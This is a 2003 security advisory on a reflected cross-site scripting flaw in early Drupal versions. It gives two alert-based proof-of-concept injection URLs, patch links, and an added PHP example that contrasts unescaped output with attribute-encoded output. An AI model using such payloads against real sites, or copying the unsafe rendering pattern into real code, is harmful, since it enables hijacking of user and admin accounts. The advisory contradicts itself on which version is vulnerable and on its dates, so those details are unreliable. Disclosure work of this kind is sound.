
Drupal XSS Vulnerability (main page and sub pages)


------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attack is possible. An attacker could access other
users' or admin Drupal accounts.

------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com
Drupal is an open-source platform and content management system for building
dynamic web sites offering a broad range of features and services including
user administration, publishing workflow, discussion capabilities, news
aggregation, metadata functionalities using controlled vocabularies and XML
publishing for content sharing purposes. Equipped with a powerful blend of
features and configurability, Drupal can support a diverse range of web
projects ranging from personal weblogs to large community-driven sites.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
 Drupal 4.2.0 RC

NOT TESTED - 90% VULNERABLE;
 Drupal 4.1.0
 Drupal 4.0.0
 Drupal 3.0.2
 Drupal 3.0.1
 Drupal 3.0.0
 Drupal 2.0.0
 Drupal 1.0.0

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.

------------------------------------------------------
Solution & Patches;
------------------------------------------------------
xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch

Download Patch Files :
http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
Better still, download the new version from www.drupal.org

[All files provided by Vendor]

------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["

------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>

Replace "[" and "]" with "<" and ">".
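
Both test URLs above begin their payload with a double quote followed by a closing angle bracket, which suggests the requested path is echoed into a quoted HTML attribute. The PHP below is an added example, not Drupal's code or the vendor patch: it assumes that reflection point, uses hypothetical function names, and shows the unescaped output beside the attribute-encoded form.

```php
<?php
// Added illustration: NOT Drupal source code. Function names are hypothetical.
// Assumption: the requested path is written back into an HTML attribute,
// which is what the '">' prefix in the advisory's test URLs suggests.

// Vulnerable pattern: request data concatenated into markup unescaped.
function render_link_unsafe(string $path): string
{
    return '<a href="' . $path . '">permalink</a>';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles so the value cannot close the
// attribute; '<' and '>' are encoded so no new tag can start.
function render_link_safe(string $path): string
{
    return '<a href="'
        . htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '">permalink</a>';
}

// True when the rendered fragment contains a live <script> element.
function has_script_element(string $html): bool
{
    $doc = new DOMDocument();
    // Suppress parser warnings for the deliberately malformed unsafe case.
    @$doc->loadHTML('<html><body>' . $html . '</body></html>');
    return $doc->getElementsByTagName('script')->length > 0;
}

// Constructed input: the path from the advisory's second test URL,
// as it would look after the server URL-decodes the request.
$path = '/node/view/666"><script>alert(document.domain)</script>';

foreach (['render_link_unsafe', 'render_link_safe'] as $fn) {
    $html = $fn($path);
    printf("%-20s script element present: %s\n", $fn,
        has_script_element($html) ? 'yes' : 'no');
    echo '  ', $html, "\n";
}
```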

------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@mavituna.com
